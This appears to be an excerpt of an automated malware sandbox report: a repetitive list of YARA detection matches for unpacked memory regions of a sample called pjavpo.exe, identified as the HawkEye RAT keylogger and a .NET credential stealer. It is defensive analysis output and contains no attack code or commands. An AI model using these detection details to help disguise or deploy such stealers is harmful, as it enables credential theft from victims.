                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.7aa0000.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
